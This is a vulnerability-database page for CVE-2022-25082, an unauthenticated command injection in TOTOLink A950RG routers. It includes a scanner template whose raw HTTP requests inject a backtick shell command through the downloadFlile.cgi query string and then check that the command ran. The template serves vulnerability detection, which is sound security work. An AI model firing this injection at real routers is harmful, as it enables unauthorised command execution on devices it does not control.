| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2022-25082 | 24 Feb 202215:15 | – | attackerkb | |
| The vulnerability of the “Main” function in the microprogramming software of the TOTOLink A950RG allows a intruder to execute arbitrary commands. | 2 Aug 202200:00 | – | bdu_fstec | |
| CVE-2022-25082 | 24 Feb 202218:14 | – | circl | |
| TotoLink A950Rg 操作系统命令注入漏洞 | 24 Feb 202200:00 | – | cnnvd | |
| TOTOLink A950RG Command Injection Vulnerability | 28 Feb 202200:00 | – | cnvd | |
| TOTOLink A860R Command Injection (CVE-2022-25076; CVE-2022-25078; CVE-2022-25079; CVE-2022-25080; CVE-2022-25081; CVE-2022-25082; CVE-2022-25083; CVE-2022-25084) | 30 Oct 202200:00 | – | checkpoint_advisories | |
| CVE-2022-25082 | 22 Feb 202222:44 | – | cve | |
| CVE-2022-25082 | 22 Feb 202222:44 | – | cvelist | |
| CVE-2022-25082 | 24 Feb 202215:15 | – | nvd | |
| CVE-2022-25082 | 24 Feb 202215:15 | – | osv |
id: CVE-2022-25082
info:
name: TOTOLink - Unauthenticated Command Injection
author: gy741
severity: critical
description: |
TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
remediation: |
Apply the latest firmware update provided by the vendor to fix the command injection vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/cve-2022-25082
- https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25082
cwe-id: CWE-78
epss-score: 0.16089
epss-percentile: 0.96529
cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: totolink
product: a950rg_firmware
tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive,vkev,vuln
variables:
cmd: "`ls>../{{randstr}}`"
http:
- raw:
- |
GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1
Host: {{Hostname}}
- |
GET /{{randstr}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- .sh
- .cgi
condition: and
- type: word
part: header_2
words:
- application/octet-stream
- type: status
status:
- 200
# digest: 490a0046304402203b3d743fba3d4d02976bc30a182c49363b92296ffd8a575e6ff8b5b88a8ab6050220148eb4c497cbb5998e1809c10c8b2100bf3d49aee50573e4e5ceedf96431a9b0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation